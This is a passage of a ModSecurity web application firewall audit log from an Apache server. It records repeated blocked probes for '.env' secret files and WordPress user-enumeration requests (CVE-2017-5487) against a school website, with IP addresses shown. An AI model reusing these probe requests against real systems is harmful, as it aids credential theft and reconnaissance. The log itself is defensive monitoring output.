Connection: close Content-Type: text/html; charset=iso-8859-1 --94045d62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749712431111428 587 (- - -) Stopwatch2: 1749712431111428 587; combined=214, p1=185, p2=0, p3=0, p4=0, p5=29, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94045d62-Z-- --41a54074-A-- [12/Jun/2025:14:22:01 +0700] aEqAGfiOwnjCOc5ARoWHEAAAABU 103.236.140.4 52518 103.236.140.4 8181 --41a54074-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept-Charset: utf-8 --41a54074-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41a54074-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749712921292370 758 (- - -) Stopwatch2: 1749712921292370 758; combined=296, p1=259, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41a54074-Z-- --a267ff31-A-- [12/Jun/2025:15:21:45 +0700] aEqOGcCW7vAFWQIjJpwviwAAAEw 103.236.140.4 49322 103.236.140.4 8181 --a267ff31-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.167.40.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.167.40.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a267ff31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a267ff31-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749716505193789 2469 (- - -) Stopwatch2: 1749716505193789 2469; combined=1262, p1=406, p2=823, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a267ff31-Z-- --b3d9093a-A-- [12/Jun/2025:16:01:42 +0700] aEqXdsCW7vAFWQIjJpxYyQAAAEc 103.236.140.4 52090 103.236.140.4 8181 --b3d9093a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.216 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Pixel XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --b3d9093a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3d9093a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749718902978709 870 (- - -) Stopwatch2: 1749718902978709 870; combined=374, p1=332, p2=0, p3=0, p4=0, p5=42, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3d9093a-Z-- --1b651f51-A-- [12/Jun/2025:16:16:51 +0700] aEqbA8CW7vAFWQIjJpxpVwAAAEw 103.236.140.4 57090 103.236.140.4 8181 --1b651f51-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept-Charset: utf-8 --1b651f51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b651f51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749719811110268 795 (- - -) Stopwatch2: 1749719811110268 795; combined=308, p1=271, p2=0, p3=0, p4=0, p5=37, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b651f51-Z-- --99e89b57-A-- [12/Jun/2025:16:43:33 +0700] aEqhRaF10OasdbQdujjjGgAAAMk 103.236.140.4 37056 103.236.140.4 8181 --99e89b57-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.138.181 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.138.181 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --99e89b57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99e89b57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749721413203483 752 (- - -) Stopwatch2: 1749721413203483 752; combined=292, p1=259, p2=0, p3=0, p4=0, p5=33, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99e89b57-Z-- --f3678533-A-- [12/Jun/2025:17:03:02 +0700] aEql1viOwnjCOc5ARoUNBgAAAA0 103.236.140.4 37268 103.236.140.4 8181 --f3678533-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux 3.8-6.dmz.1-liquorix-686) KHTML/4.8.4 (like Gecko) Konqueror/4.8 Accept-Charset: utf-8 --f3678533-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3678533-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749722582823406 858 (- - -) Stopwatch2: 1749722582823406 858; combined=362, p1=319, p2=0, p3=0, p4=0, p5=43, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3678533-Z-- --4fa32f3b-A-- [12/Jun/2025:17:05:39 +0700] aEqmc_iOwnjCOc5ARoUNCgAAAAI 103.236.140.4 37300 103.236.140.4 8181 --4fa32f3b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.216 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --4fa32f3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4fa32f3b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749722739301752 777 (- - -) Stopwatch2: 1749722739301752 777; combined=316, p1=269, p2=0, p3=0, p4=0, p5=47, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4fa32f3b-Z-- --f67ae732-A-- [12/Jun/2025:17:09:39 +0700] aEqnY_iOwnjCOc5ARoUNDgAAAA8 103.236.140.4 37330 103.236.140.4 8181 --f67ae732-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.230.246.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.230.246.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f67ae732-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f67ae732-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749722979687894 3303 (- - -) Stopwatch2: 1749722979687894 3303; combined=1392, p1=484, p2=878, p3=0, p4=0, p5=30, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f67ae732-Z-- --3426e35f-A-- [12/Jun/2025:17:18:25 +0700] aEqpccCW7vAFWQIjJpyU2wAAAEA 103.236.140.4 37418 103.236.140.4 8181 --3426e35f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.84.99.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.84.99.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3426e35f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3426e35f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749723505666312 3254 (- - -) Stopwatch2: 1749723505666312 3254; combined=1433, p1=475, p2=921, p3=0, p4=0, p5=37, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3426e35f-Z-- --c2a33556-A-- [12/Jun/2025:17:44:55 +0700] aEqvp8CW7vAFWQIjJpyfAwAAAEM 103.236.140.4 53578 103.236.140.4 8181 --c2a33556-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 179.108.89.106 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 179.108.89.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2a33556-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2a33556-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749725095671540 3498 (- - -) Stopwatch2: 1749725095671540 3498; combined=1577, p1=559, p2=982, p3=0, p4=0, p5=36, sr=151, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2a33556-Z-- --f2b2fc3c-A-- [12/Jun/2025:18:25:41 +0700] aEq5NWDP2O-J0msTyvVWrwAAAIg 103.236.140.4 59236 103.236.140.4 8181 --f2b2fc3c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5 Accept-Charset: utf-8 --f2b2fc3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2b2fc3c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749727541671792 948 (- - -) Stopwatch2: 1749727541671792 948; combined=374, p1=331, p2=0, p3=0, p4=0, p5=43, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2b2fc3c-Z-- --7fc9536a-A-- [12/Jun/2025:18:25:43 +0700] aEq5N6F10OasdbQdujhA7QAAANI 103.236.140.4 59238 103.236.140.4 8181 --7fc9536a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.159 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --7fc9536a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7fc9536a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749727543932023 868 (- - -) Stopwatch2: 1749727543932023 868; combined=376, p1=334, p2=0, p3=0, p4=0, p5=42, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fc9536a-Z-- --b93db70b-A-- [12/Jun/2025:19:57:06 +0700] aErOoqF10OasdbQdujhFGAAAAMQ 103.236.140.4 36736 103.236.140.4 8181 --b93db70b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.181.8.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.181.8.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b93db70b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b93db70b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749733026596953 3141 (- - -) Stopwatch2: 1749733026596953 3141; combined=1406, p1=502, p2=874, p3=0, p4=0, p5=30, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b93db70b-Z-- --bc316e6a-A-- [12/Jun/2025:20:13:11 +0700] aErSZ6F10OasdbQdujhFUQAAAM4 103.236.140.4 36908 103.236.140.4 8181 --bc316e6a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-gb; GT-I9305 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 --bc316e6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc316e6a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749733991370741 926 (- - -) Stopwatch2: 1749733991370741 926; combined=352, p1=311, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc316e6a-Z-- --9d86df76-A-- [12/Jun/2025:20:13:12 +0700] aErSaMCW7vAFWQIjJpyx-wAAAFQ 103.236.140.4 36910 103.236.140.4 8181 --9d86df76-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) --9d86df76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d86df76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749733992046671 821 (- - -) Stopwatch2: 1749733992046671 821; combined=317, p1=276, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d86df76-Z-- --be48c046-A-- [12/Jun/2025:20:37:31 +0700] aErYG8CW7vAFWQIjJpzKgwAAAE4 103.236.140.4 33240 103.236.140.4 8181 --be48c046-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.135.232.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.135.232.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36 Accept: */* --be48c046-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be48c046-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749735451535505 678 (- - -) Stopwatch2: 1749735451535505 678; combined=263, p1=235, p2=0, p3=0, p4=0, p5=28, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be48c046-Z-- --7b3b0d1d-A-- [12/Jun/2025:20:54:08 +0700] aErcAPiOwnjCOc5ARoVOaQAAABU 103.236.140.4 41944 103.236.140.4 8181 --7b3b0d1d-B-- GET /_static/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.80 Mobile Safari/537.36 Accept-Charset: utf-8 --7b3b0d1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b3b0d1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749736448453474 848 (- - -) Stopwatch2: 1749736448453474 848; combined=380, p1=343, p2=0, p3=0, p4=0, p5=36, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b3b0d1d-Z-- --7f59516d-A-- [12/Jun/2025:21:32:46 +0700] aErlDmDP2O-J0msTyvWsIgAAAJg 103.236.140.4 43464 103.236.140.4 8181 --7f59516d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.155 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.155 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --7f59516d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f59516d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749738766434031 770 (- - -) Stopwatch2: 1749738766434031 770; combined=361, p1=326, p2=0, p3=0, p4=0, p5=35, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f59516d-Z-- --10fe6d4a-A-- [12/Jun/2025:21:32:47 +0700] aErlD8CW7vAFWQIjJpwFIQAAAEg 103.236.140.4 43516 103.236.140.4 8181 --10fe6d4a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.155 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 